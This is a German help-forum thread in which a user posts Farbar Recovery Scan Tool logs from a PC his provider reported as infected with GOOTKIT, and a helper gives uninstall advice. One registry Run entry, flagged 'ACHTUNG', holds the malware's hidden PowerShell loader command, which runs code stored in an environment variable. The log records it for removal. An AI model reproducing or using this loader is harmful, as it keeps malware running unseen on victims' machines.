FirewallRules: [{5D328195-9B4E-43F0-AA72-96613C29D39F}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 11\programs\RM.exe (Pinnacle Systems) [Datei ist nicht signiert]
FirewallRules: [{69E66B2A-B22A-4503-AE6F-07F07BC2245E}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 11\programs\RM.exe (Pinnacle Systems) [Datei ist nicht signiert]
FirewallRules: [{1F0566FC-962D-4CD4-AE78-420A43A465E8}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe (McAfee, LLC -> McAfee, LLC)
FirewallRules: [{D29AC411-467F-4416-B78A-8569A1C2DFF9}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe => Keine Datei
FirewallRules: [{D97DA325-BD62-4F0D-B0D7-6296D6997D38}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe => Keine Datei
FirewallRules: [{6B70FC3E-B345-4FD9-85C3-2A1FC0C17A34}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe => Keine Datei
FirewallRules: [{EE117AE4-F767-4867-A1FF-E3D21711F90C}] => (Allow) C:\Program Files (x86)\Common Files\Mcafee\MMSSHost\MMSSHost.exe (McAfee, LLC -> McAfee, LLC)
FirewallRules: [{3E1C8336-EBAB-49A0-8B59-778643A41040}] => (Allow) C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHost.exe (McAfee, LLC -> McAfee, LLC)
FirewallRules: [{DFA8AADA-88FC-42CA-9062-995E26FA6EF6}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{BFB25E99-F6C9-4EDC-A91D-C118EE06853F}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{138DFF76-5C3D-469A-9D68-FC8479590C3E}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{8DFF8679-2A71-4447-B774-EB60DA9BFE91}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{339D5AAB-06EB-4649-BCE1-808561764131}] => (Allow) C:\Program Files\MAGIX\Video deluxe Plus\2020\Videodeluxe.exe (MAGIX Software GmbH -> MAGIX Software GmbH)

==================== Wiederherstellungspunkte =========================

06-09-2020 08:16:58 Installed Epson Software Updater
19-09-2020 19:07:53 Windows Modules Installer
16-10-2020 09:03:00 Windows Modules Installer
24-10-2020 15:16:35 Windows Modules Installer
12-11-2020 19:01:41 
12-11-2020 19:01:57 Windows Update
22-11-2020 18:12:18 Konfiguriert AeroFly Professional Deluxe AddOn 3 (True Scale Add?à*!0
11-12-2020 10:35:05 Windows Modules Installer
31-12-2020 16:19:29 Windows Modules Installer

==================== Fehlerhafte Geräte im Gerätemanager ============


==================== Fehlereinträge in der Ereignisanzeige: ========================

Applikationsfehler:
==================
Error: (01/13/2021 08:42:22 PM) (Source: SecurityCenter) (EventID: 17) (User: )
Description: Das Sicherheitscenter konnte den Aufrufer nicht überprüfen. Der Fehler %1 ist aufgetreten.

Error: (01/13/2021 08:35:20 PM) (Source: Firefox Default Browser Agent) (EventID: 12007) (User: )
Description: Event-ID 12007

Error: (01/13/2021 08:35:20 PM) (Source: Firefox Default Browser Agent) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/13/2021 08:32:51 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: InCD.exe, Version: 4.3.7.3, Zeitstempel: 0x41a724b6
Name des fehlerhaften Moduls: InCD.exe, Version: 4.3.7.3, Zeitstempel: 0x41a724b6
Ausnahmecode: 0xc000041d
Fehleroffset: 0x00015242
ID des fehlerhaften Prozesses: 0x3450
Startzeit der fehlerhaften Anwendung: 0x01d6e9e2df88dc96
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\Ahead\InCD\InCD.exe
Pfad des fehlerhaften Moduls: C:\Program Files (x86)\Ahead\InCD\InCD.exe
Berichtskennung: 513a837f-141b-4921-bb39-40a15d33fe0e
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (01/13/2021 08:32:50 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: InCD.exe, Version: 4.3.7.3, Zeitstempel: 0x41a724b6
Name des fehlerhaften Moduls: InCD.exe, Version: 4.3.7.3, Zeitstempel: 0x41a724b6
Ausnahmecode: 0xc0000005
Fehleroffset: 0x00015242
ID des fehlerhaften Prozesses: 0x3450
Startzeit der fehlerhaften Anwendung: 0x01d6e9e2df88dc96
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\Ahead\InCD\InCD.exe
Pfad des fehlerhaften Moduls: C:\Program Files (x86)\Ahead\InCD\InCD.exe
Berichtskennung: cb17cee3-06e7-4a77-8f9e-b7a9b40a98f1
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (01/12/2021 03:25:33 PM) (Source: SecurityCenter) (EventID: 17) (User: )
Description: Das Sicherheitscenter konnte den Aufrufer nicht überprüfen. Der Fehler %1 ist aufgetreten.

Error: (01/12/2021 03:17:53 PM) (Source: SecurityCenter) (EventID: 17) (User: )
Description: Das Sicherheitscenter konnte den Aufrufer nicht überprüfen. Der Fehler %1 ist aufgetreten.

Error: (01/12/2021 03:15:48 PM) (Source: Sophos Anti-Virus) (EventID: 13) (User: )
Description: Event-ID 13


Systemfehler:
=============
Error: (01/12/2021 03:23:31 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: Der Dienst "InCDsrv" wurde mit dem folgenden dienstspezifischen Fehler beendet: 
Unzulässige Funktion.

Error: (01/12/2021 03:21:59 PM) (Source: DCOM) (EventID: 10010) (User: NT-AUTORITÄT)
Description: Der Server "{ADA518B9-B7A3-4C36-B4ED-49EB3FA189FC}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (01/12/2021 03:21:59 PM) (Source: DCOM) (EventID: 10010) (User: NT-AUTORITÄT)
Description: Der Server "{ADA518B9-B7A3-4C36-B4ED-49EB3FA189FC}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (01/12/2021 03:15:50 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: Der Dienst "InCDsrv" wurde mit dem folgenden dienstspezifischen Fehler beendet: 
Unzulässige Funktion.

Error: (01/12/2021 03:15:32 PM) (Source: volmgr) (EventID: 46) (User: )
Description: Die Initialisierung des Speicherabbildes ist fehlgeschlagen.

Error: (01/12/2021 02:55:34 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: Der Dienst "InCDsrv" wurde mit dem folgenden dienstspezifischen Fehler beendet: 
Unzulässige Funktion.

Error: (01/09/2021 04:50:03 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: Der Dienst "InCDsrv" wurde mit dem folgenden dienstspezifischen Fehler beendet: 
Unzulässige Funktion.

Error: (01/09/2021 04:49:55 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: Das System wurde zuvor am ‎08.‎01.‎2021 um 08:54:50 unerwartet heruntergefahren.


CodeIntegrity:
===================================

Date: 2021-01-13 20:42:22.8280000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.

Date: 2021-01-13 20:42:22.8230000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.

Date: 2021-01-13 20:42:22.7690000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.

Date: 2021-01-13 20:42:22.7530000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.

Date: 2021-01-13 20:37:21.3530000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\SIHClient.exe) attempted to load \Device\HarddiskVolume4\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.

Date: 2021-01-13 20:37:21.3470000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\SIHClient.exe) attempted to load \Device\HarddiskVolume4\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.

Date: 2021-01-13 20:37:21.3400000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\SIHClient.exe) attempted to load \Device\HarddiskVolume4\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.

Date: 2021-01-13 20:37:21.3350000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\SIHClient.exe) attempted to load \Device\HarddiskVolume4\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.

==================== Speicherinformationen =========================== 

BIOS: FUJITSU // American Megatrends Inc. V4.6.5.3 R1.23.0 for D3162-A1x 12/01/2014
Hauptplatine: FUJITSU D3162-A1
Prozessor: Intel(R) Core(TM) i5-3570 CPU @ 3.40GHz
Prozentuale Nutzung des RAM: 41%
Installierter physikalischer RAM: 8107.74 MB
Verfügbarer physikalischer RAM: 4729.41 MB
Summe virtueller Speicher: 12203.74 MB
Verfügbarer virtueller Speicher: 7619.57 MB

==================== Laufwerke ================================

Drive c: (Windows) (Fixed) (Total:930.12 GB) (Free:714.67 GB) NTFS
Drive f: (Daten) (Fixed) (Total:634.76 GB) (Free:269.72 GB) NTFS
Drive g: (Volume) (Fixed) (Total:296.75 GB) (Free:167.42 GB) NTFS
Drive h: () (Removable) (Total:58.85 GB) (Free:58.83 GB) exFAT

\\?\Volume{897fd41d-0000-0000-0000-100000000000}\ () (Fixed) (Total:0.49 GB) (Free:0.45 GB) NTFS
\\?\Volume{897fd41d-0000-0000-0000-d0a6e8000000}\ () (Fixed) (Total:0.91 GB) (Free:0.41 GB) NTFS

==================== MBR & Partitionstabelle ====================

==========================================================
Disk: 0 (MBR Code: Windows XP) (Size: 931.5 GB) (Disk ID: 8D638B93)
Partition 1: (Not Active) - (Size=634.8 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=296.7 GB) - (Type=07 NTFS)

==========================================================
Disk: 1 (Size: 931.5 GB) (Disk ID: 897FD41D)
Partition 1: (Active) - (Size=500 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=930.1 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=928 MB) - (Type=27)

==========================================================
Disk: 2 (Protective MBR) (Size: 58.9 GB) (Disk ID: 00000000)

Partition: GPT.

==================== Ende von Addition.txt =======================
         
Auf dem Rechner war auch kurzzeitig noch ein Sophos installiert, aber wieder entfernt und auch nicht fündig.
Disk2 ist die Transfer-SD-Karte.

Es gibt neben dem GOOTKIT auch einiges aufzuräumen ...

Gut, dass es Euch gibt, freundliche Grüße Andreas

Alt 13.01.2021, 21:54   #2
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet - Standard

vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet



Störende, veraltete oder unnötige Programme deinstallieren

Bitte über Programme und Features (appwiz.cpl) deinstallieren:

Adobe Acrobat Reader DC
Adobe Flash Player 32 NPAPI
LibreOffice 5.2 Help Pack
LibreOffice 5.2.6.2
McAfee® Total Protection
Nero Suite
Samsung Magician
WebAdvisor von McAfee
Yahoo! Desktop Login
__________________

__________________

Alt 13.01.2021, 22:57   #3
Andy4Peter
 
vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet - Beitrag

Anwendungen deinstalliert und neu gescannt



FRST.txt

Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 09-01-2021
durchgeführt von Peter (Administrator) auf ESPRIMO (FUJITSU ESPRIMO P910) (13-01-2021 22:44:45)
Gestartet von C:\Users\Peter\Desktop
Geladene Profile: Peter
Platform: Windows 10 Pro Version 2004 19041.685 (X64) Sprache: Deutsch (Deutschland)
Standard-Browser: FF
Start-Modus: Normal

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(MAGIX Software GmbH -> MAGIX Software GmbH) C:\Program Files (x86)\MAGIX\MAGIX PC Check & Tuning 2019\Autopilot.exe
(MAGIX Software GmbH -> MAGIX) C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\QMxNetworkSync.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Users\Peter\AppData\Local\Microsoft\OneDrive\OneDrive.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\splwow64.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\oobe\UserOOBEBroker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe <2>
(SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Program Files (x86)\EPSON Software\Download Navigator\EPSDNMON.EXE
(SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Program Files (x86)\EPSON Software\Epson Printer Connection Checker\EPPCCMON.EXE
(SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION) C:\Program Files (x86)\EPSON Software\Event Manager\EEventManager.exe
(SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Program Files (x86)\epson\MyEpson Portal\mep.exe
(SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Program Files (x86)\epson\MyEpson Portal\mepService.exe
(SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
(SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\x64\3\E_YATIRGE.EXE
(Simplitec GmbH -> simplitec GmbH) C:\Program Files (x86)\simplitec\simplitec\simpliclean\ServiceProvider.exe

==================== Registry (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [302904 2019-07-19] (Apple Inc. -> Apple Inc.)
HKLM\...\Run: [EPPCCMON] => C:\Program Files (x86)\EPSON Software\Epson Printer Connection Checker\EPPCCMON.EXE [442936 2020-10-22] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
HKLM-x32\...\Run: [ApnUpdater] => "C:\Program Files (x86)\Ask.com\Updater\Updater.exe"
HKLM-x32\...\Run: [TrayServer] => C:\Program Files (x86)\MAGIX\Video_deluxe_MX_Plus\TrayServer_de.exe [90112 2008-08-07] (MAGIX AG) [Datei ist nicht signiert]
HKLM-x32\...\Run: [InCD] => C:\Program Files (x86)\Ahead\InCD\InCD.exe
HKLM-x32\...\Run: [EEventManager] => C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe [1087184 2016-01-20] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
HKU\S-1-5-21-716491260-3257532223-3478221735-1001\...\Run: [QMxNetworkSync] => C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\QMxNetworkSync.exe [851704 2018-11-13] (MAGIX Software GmbH -> MAGIX)
HKU\S-1-5-21-716491260-3257532223-3478221735-1001\...\Run: [EPLTarget\P0000000000000000] => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YATIRGE.EXE [417776 2014-11-14] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
HKU\S-1-5-21-716491260-3257532223-3478221735-1001\...\Run: [NBJ] => "C:\Program Files (x86)\Ahead\Nero BackItUp\NBJ.exe"
HKU\S-1-5-21-716491260-3257532223-3478221735-1001\...\Run: [EPSDNMON] => C:\Program Files (x86)\Epson Software\Download Navigator\EPSDNMON.EXE [346712 2020-07-27] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
HKU\S-1-5-21-716491260-3257532223-3478221735-1001\...\Run: [acbdabdacadcfecb] => powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -Command "IEX([Environment]::GetEnvironmentVariable('acbdabdacadcfecb', 'User'))" <==== ACHTUNG
HKLM\...\Print\Monitors\EPSON XP-900 Series 64MonitorBE: C:\WINDOWS\system32\E_YLMBRGE.DLL [182784 2015-12-09] (Microsoft Windows Hardware Compatibility Publisher -> SEIKO EPSON CORPORATION)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {089E1D84-AEE0-488C-88A7-D6CE087096DD} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [693216 2021-01-06] (Mozilla Corporation -> Mozilla Foundation)
Task: {1AC2B76D-154F-426F-BB05-D603135A0EBE} - System32\Tasks\NvTmRepCR2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [950480 2018-11-13] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {202BF09C-1BD8-4167-8066-25DA191AA479} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [950480 2018-11-13] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {2E8498E4-689C-4F83-B839-9833BFFAE19E} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [696016 2018-11-13] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {37662CC2-C397-464F-84B3-93206B6AFB9B} - System32\Tasks\MAGIX PC Check & Tuning 2019 (Autopilot.exe) => C:\Program Files (x86)\MAGIX\MAGIX PC Check & Tuning 2019\Autopilot.exe [1743944 2018-06-01] (MAGIX Software GmbH -> MAGIX Software GmbH)
Task: {719C960A-5108-4058-AF9F-1A0C8C497CCA} - \Microsoft\Windows\UNP\RunCampaignManager -> Keine Datei <==== ACHTUNG
Task: {72ABF53D-DE0C-4F2B-8B8F-1B16D29DCEDB} - System32\Tasks\NvTmRepCR3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [950480 2018-11-13] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {7CC7F993-3346-4FD8-A972-13FACE1F2619} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [855760 2018-11-13] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {814181A9-9584-41EF-8CA3-2AF505F4759C} - System32\Tasks\G2MUploadTask-S-1-5-21-716491260-3257532223-3478221735-1001 => C:\Users\Peter\AppData\Local\GoToMeeting\19228\g2mupload.exe [31320 2020-12-20] (LogMeIn, Inc. -> LogMeIn, Inc.)
Task: {946656EB-B6E2-4550-8811-989045BA23B8} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [570240 2017-02-14] (Apple Inc. -> Apple Inc.)
Task: {99BED539-9120-4146-9180-D1E59C67DE71} - System32\Tasks\simplitec Power Suite (Tray) => C:\Program Files (x86)\simplitec\simplitec\simpliclean\ServiceProvider.exe [1269424 2016-04-04] (Simplitec GmbH -> simplitec GmbH)
Task: {9A85E7E9-04B7-460B-B949-081BBF76EF44} - System32\Tasks\EPSON XP-900 Series Update {F9A32729-647E-4849-9E12-C9EB3BAD9726} => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSRGE.EXE [690536 2013-11-22] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
Task: {CB69C3AD-49EC-42FF-9D2B-90B0C3AF74F1} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [855760 2018-11-13] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {D2251CC8-0C3D-46BE-B0BB-3CBD9402AB4C} - System32\Tasks\MAGIX PC Check & Tuning 2019 => C:\Program Files (x86)\MAGIX\MAGIX PC Check & Tuning 2019\PCCT.exe [2467912 2018-06-01] (MAGIX Software GmbH -> MAGIX Software GmbH)
Task: {E84AA775-BBCA-46C9-A901-286E75FF8DA3} - System32\Tasks\NvTmRepCR1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [950480 2018-11-13] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F1F10BFF-3BC5-45A5-945E-7A0157B66721} - \Scheduled Update for Ask Toolbar -> Keine Datei <==== ACHTUNG
Task: {F4362CDF-E227-43AB-9675-F299571D3DB3} - System32\Tasks\G2MUpdateTask-S-1-5-21-716491260-3257532223-3478221735-1001 => C:\Users\Peter\AppData\Local\GoToMeeting\19228\g2mupdate.exe [31320 2020-12-20] (LogMeIn, Inc. -> LogMeIn, Inc.)
Task: {F9E879E4-5908-487B-AF89-89F952AF276B} - System32\Tasks\simplitec Power Suite => C:\Program Files (x86)\simplitec\simplitec\simpliclean\PowerSuite.exe [2238128 2016-04-04] (Simplitec GmbH -> simplitec GmbH)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\EPSON XP-900 Series Update {F9A32729-647E-4849-9E12-C9EB3BAD9726}.job => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSRGE.EXE:/EXE:{F9A32729-647E-4849-9E12-C9EB3BAD9726} /F:UpdateWORKGROUP\ESPRIMO$ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi
Task: C:\WINDOWS\Tasks\G2MUpdateTask-S-1-5-21-716491260-3257532223-3478221735-1001.job => C:\Users\Peter\AppData\Local\GoToMeeting\19228\g2mupdate.exe
Task: C:\WINDOWS\Tasks\G2MUploadTask-S-1-5-21-716491260-3257532223-3478221735-1001.job => C:\Users\Peter\AppData\Local\GoToMeeting\19228\g2mupload.exe
Task: C:\WINDOWS\Tasks\MAGIX PC Check & Tuning 2019 (Autopilot.exe).job => C:\Program Files (x86)\MAGIX\MAGIX PC Check & Tuning 2019\Autopilot.exe C:\Program Files (x86)\MAGIX\MAGIX PC Check & Tuning 2019\ESPRIMO\Peter-MAGIX PC Check & Tuning 2019 (Autopilot.exe
Task: C:\WINDOWS\Tasks\MAGIX PC Check & Tuning 2019.job => C:\Program Files (x86)\MAGIX\MAGIX PC Check & Tuning 2019\PCCT.exe
Task: C:\WINDOWS\Tasks\simplitec Power Suite (Tray).job => C:\Program Files (x86)\simplitec\simplitec\simpliclean\ServiceProvider.exe
Task: C:\WINDOWS\Tasks\simplitec Power Suite.job => C:\Program Files (x86)\simplitec\simplitec\simpliclean\PowerSuite.exe

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 80.69.96.12 81.210.129.4
Tcpip\..\Interfaces\{b0472145-145f-4c3d-98b1-09bcd94a9b64}: [DhcpNameServer] 80.69.96.12 81.210.129.4

Edge: 
======
Edge Profile: C:\Users\Peter\AppData\Local\Microsoft\Edge\User Data\Default [2021-01-08]

FireFox:
========
FF DefaultProfile: q8p7ea2o.default
FF ProfilePath: C:\Users\Peter\AppData\Roaming\Mozilla\Firefox\Profiles\q8p7ea2o.default [2021-01-13]
FF Homepage: Mozilla\Firefox\Profiles\q8p7ea2o.default -> hxxps:\\\\www.ecosia.org/
FF Notifications: Mozilla\Firefox\Profiles\q8p7ea2o.default -> hxxps://www.epson.de
FF NewTabOverride: Mozilla\Firefox\Profiles\q8p7ea2o.default -> Disabled: web@Converter
FF Extension: (Ecosia – Die Suchmaschine, die Bäume pflanzt) - C:\Users\Peter\AppData\Roaming\Mozilla\Firefox\Profiles\q8p7ea2o.default\Extensions\{d04b0b40-3dab-4f0b-97a6-04ec3eddbfb0}.xpi [2019-01-02]

==================== Dienste (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [96056 2019-04-29] (Apple Inc. -> Apple Inc.)
S3 ElfoService; C:\Program Files (x86)\ElsterFormular Update Service\bin\elfoService.exe [1284360 2018-03-31] (Bayerisches Landesamt fuer Steuern -> )
R2 EpsonScanSvc; C:\WINDOWS\system32\EscSvc64.exe [145224 2016-11-08] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
S2 Fabs; C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe [1858048 2012-01-23] (MAGIX AG) [Datei ist nicht signiert]
S3 FirebirdServerMAGIXInstance; C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\fbserver.exe [2702848 2011-04-26] (MAGIX®) [Datei ist nicht signiert]
R2 MyEpson Portal Service; C:\Program Files (x86)\EPSON\MyEpson Portal\mepService.exe [714712 2017-06-28] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
S2 PCLEPCI; C:\Windows\SysWOW64\drivers\pclepci.sys [14165 2005-02-09] (Pinnacle Systems GmbH) [Datei ist nicht signiert]
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5197552 2020-12-11] (Microsoft Windows Publisher -> Microsoft Corporation)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [3004048 2019-12-07] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103384 2019-12-07] (Microsoft Windows Publisher -> Microsoft Corporation)
S2 InCDsrv; C:\Program Files (x86)\Ahead\InCD\InCDsrv.exe [X]
S2 InCDsrvR; C:\Program Files (x86)\Ahead\InCD\InCDsrv.exe -r [X]
S2 McAfee WebAdvisor; "C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe" [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S3 61883; C:\WINDOWS\System32\drivers\61883.sys [70144 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
S0 amdkmafd; C:\WINDOWS\System32\drivers\amdkmafd.sys [49448 2016-08-18] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [Datei ist nicht signiert]
S3 FscEfDmi; C:\WINDOWS\System32\drivers\FscEfDmi.sys [25856 2014-04-16] (Fujitsu Technology Solutions GmbH -> Fujitsu Technology Solutions)
S3 FscGabi; C:\WINDOWS\System32\drivers\FscGabi.sys [29952 2014-04-16] (Fujitsu Technology Solutions GmbH -> Fujitsu Technology Solutions)
